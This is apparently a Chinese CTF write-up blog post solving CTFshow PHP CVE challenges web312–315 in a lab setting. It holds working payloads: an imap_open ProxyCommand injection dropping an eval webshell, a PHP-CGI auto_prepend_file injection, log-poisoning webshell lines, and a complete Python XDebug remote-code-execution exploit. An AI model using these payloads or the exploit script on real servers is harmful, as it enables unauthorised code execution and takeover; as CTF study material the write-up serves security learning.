CTFSHOW PHPCVE复现

最新推荐文章于 2024-05-13 15:30:53 发布
最新推荐文章于 2024-05-13 15:30:53 发布
阅读量870 收藏
点赞数
分类专栏: CTFSHOW 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/127152555
版权

web312(CVE-2018-19518)

进入页面 

 抓包

发现是X-Powered-By: PHP/5.6.38  百度搜一下 发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。

PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。 
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 
如果启用了 rsh 和 ssh 功能并且 rsh 命令是 ssh 命令的符号链接,则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。 
成功的攻击可能允许攻击者绕过其他禁用的 exec 受影响软件中的功能,攻击者可利用这些功能在目标系统上执行任意 shell 命令。 
imap_open(string $mailbox , string $username , string $password)函数中的mailbox是执行命令参数的一部分,所以我们可以通过更改邮箱名来进行命令注入执行

payload:

hostname=x+-oProxyCommand=echo echo '<?php eval($_POST[a])?>'>/var/www/html/1.php|base64 -d|sh}&username=11&password=11
编码之后:
||
\/
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbYV0pPz4nPi92YXIvd3d3L2h0bWwvMS5waHA%3d%3d|base64%09-d|sh}&username=11&password=11

 

web313(CVE-2012-1823)

漏洞介绍:

本漏洞 就是PHP-CGI 这个sapi出现的漏洞,php-cgi有两种运行方式 cgi和fastcgi 而本漏洞出现在CGI模式运行的php中。

这个漏洞简单来说就是用户请求的querystring 被作为了php-cgi的参数,最终导致了一系列的结果。

研究下原理 ,RFC3875中规定,当querystring中不包含没有解码的=号的情况下,要将querystring作为cgi的参数传入。所以,Apache服务器按要求实现了这个功能。

漏洞利用:

cgi模式下有如下一些参数可用:

  • -c 指定php.ini文件的位置
  • -n 不要加载php.ini文件
  • -d 指定配置项
  • -b 启动fastcgi进程
  • -s 显示文件源码
  • -T 执行指定次该文件
  • -h-? 显示帮助

最简单的利用方式  就是 -s ,可以直接显示源码。

而fastcgi 还可以用到 更好的方法: 通过 -d  指定 auto_prepend_file 来制造任意文件包含漏洞。

在本题,先用 index.php?-s 看看源码。

可以直接用 -d 来 直接打

index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

<?php system('tac /somewhere/*')?>

参考文献:Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 | 离别歌

PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析 - 腾讯云开发者社区-腾讯云

web314

不算 CVE   算个小trick 。

<?php

error_reporting(0);

highlight_file(__FILE__);

//phpinfo
$file = $_GET['f'];

if(!preg_match('/\:/',$file)){
    include($file);
}
?f=/var/log/nginx/access.log

日志写上几句话木马<?php eval($_POST[1])?>,然后getshell

1=system('tac+/f*');

这里 包含seesion 文件应该也是可以的,这里直接用日志包含了

?f=/var/log/nginx/access.log

日志写上几句话木马<?php eval($_POST[1])?>,然后getshell

1=system('tac+/f*');

web315 (xdebug 远程代码执行)

如果服务器上开启了xdebug的调试,可能会导致被攻击者利用导致命令执行。

xdebug的攻击面 | Spoock

vulhub/php/xdebug-rce at master · vulhub/vulhub · GitHub

exp:

#!/usr/bin/env python3
import re
import sys
import time
import requests
import argparse
import socket
import base64
import binascii
from concurrent.futures import ThreadPoolExecutor


pool = ThreadPoolExecutor(1)
session = requests.session()
session.headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}

def recv_xml(sock):
    blocks = []
    data = b''
    while True:
        try:
            data = data + sock.recv(1024)
        except socket.error as e:
            break
        if not data:
            break

        while data:
            eop = data.find(b'\x00')
            if eop < 0:
                break
            blocks.append(data[:eop])
            data = data[eop+1:]

        if len(blocks) >= 4:
            break
    
    return blocks[3]


def trigger(url):
    time.sleep(2)
    try:
        session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
    except:
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
    parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
    parser.add_argument('-t', '--target', required=True, help='target url.')
    parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
    args = parser.parse_args()
    
    ip_port = ('0.0.0.0', args.listen)
    sk = socket.socket()
    sk.settimeout(10)
    sk.bind(ip_port)
    sk.listen(5)

    pool.submit(trigger, args.target)
    conn, addr = sk.accept()
    conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))

    data = recv_xml(conn)
    print('[+] Recieve data: ' + data.decode())
    g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
    if not g:
        print('[-] No result...')
        sys.exit(0)

    data = g.group(1)

    try:
        print('[+] Result: ' + base64.b64decode(data).decode())
    except binascii.Error:
        print('[-] May be not string result...')

在公网运行上面的脚本。 

python3 exp.py -t http://8731e14f-ee10-4df2-99f0-fef35075f5b3.challenge.ctf.show/index.php -c 'shell_exec("ls");'

 两个地址都没连 上去 ,就先搁置一边了。

snowlyzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现是什么.txt
01-31
漏洞复现
CTFSHOW--PHPCVE复现
qq_49422880的博客
02-22 3262
CTFSHOW--PHPCVE复现web311[CVE-2019-11043]web312(CVE-2018-19518)web313(CVE-2018-19518)web314:(日志文件包含)web315:(XDebug 远程调试漏洞) web311[CVE-2019-11043] web312(CVE-2018-19518) 同样,没有任何的界面就直接抓包,发现是X-Powered-By: PHP/5.6.38,网上搜索发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。 简介:
ctfshow web入门(phpcve)
qq_53263789的博客
07-19 707
ctfshow
vulfocus靶场thinkphp命令执行cve-2018-1002015
没有故事
04-21 268
漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1271
ctfshow phpCVEweb311,web312,web313,web314,web315) CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
ctfshow phpCVE web311~315
shinygod的博客
10-07 669
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
buuctf [PHP]CVE-2019-11043
qq_1873822的博客
03-25 451
漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/].php(/|KaTeX parse error: Can't use function '\.' in math mode at position 38: …pa
论文复现-深度补全算法
03-10
1、传统深度不全算法复现 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、复现代码可直接运行、包含有测试用例、以及验证代码
numpy实现adaboost算法复现
10-16
Adaboost是一种迭代算法,其核心思想是针对同一个训练集训练不同的分类器(弱分类器),然后把这些弱分类器集合起来,构成一个更强的最终分类器(强分类器)。
使用numpy复现贝叶斯网络
10-16
适合学习机器学习算法入门 学习numpy开发机器学习算法
ctf_show笔记篇(web入门---phpCVE
whale_waves的博客
03-22 1201
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。x+-oProxyCommand=echo 'base64编码后的命令'|base64 -d|sh}漏洞名称:PHP-CGI远程代码执行漏洞。
PHP反序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3515
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 1788
ctfshow-php-CVE-wp----------
2024年PHP--远程命令执行漏洞CVE-2018-19518复现(1),2024年最新C C++最牛教材
最新发布
2401_84973631的博客
05-13 166
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包。%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功。这里我们进入容器查看刚才文件是否创建成功,先查询id。使用burp进行抓包,并发送到Repeater里。然后我们进入到该目录下使用docker启动。首先进入环境,最好在root权限下进行。查看容器id后在下面命令中输入id进入。然后我们修改数据包,添加一段执行代码。
php远程代码执行漏洞绕过,PHP远程代码执行漏洞:CVE
weixin_42127754的博客
03-19 263
漏洞详情:Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。影响范围:Nginx+php-fpm的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。location ~ [^/]\.php(/|$) {fastcg...
CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3045
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
XDebug 远程调试漏洞复现(代码执行)
m0_58687645的博客
01-10 2655
环境搭建 启动docker systemctl start docker 进入对应目录 cd vulhub/php/xdebug-rce/ 启动容器 docker-compose up -d 查看容器 docker ps 访问8080端口(搭建成功) 在本机执行exp exp的位置在vulhub/php/xdebug-rce/目录下(成功执行) python3 exp.py -t http://10.106.8.91:8080/index.php -c 'shell_exec..
php-fpm (CVE-2019-11043)漏洞复现
thelostworld
05-11 264
漏洞详情来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大影响版本当Nginx + php-
RXDNFuse复现
05-01
RXDNFuse是一种用于绕过Windows用户账户控制(UAC)的技术,它可以使得普通用户获得管理员权限。这个技术是通过DLL注入来实现的。具体地说,它通过将恶意DLL注入到Windows系统进程中,并利用进程完整性级别低于管理员权限的漏洞,从而绕过UAC限制,获取系统管理员权限。 复现RXDNFuse技术需要具备一定的技术知识和实践经验。简单来说,复现RXDNFuse的过程包括以下几个步骤: 1. 寻找可注入的Windows系统进程; 2. 制作恶意DLL文件; 3. 利用工具或手动将恶意DLL注入到系统进程中; 4. 触发漏洞,使得恶意DLL被执行; 5. 获得管理员权限。 需要注意的是,复现RXDNFuse技术属于安全研究领域,只能在合法授权和安全测试环境下进行。在未经授权的情况下使用该技术可能会触犯法律法规,造成不必要的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值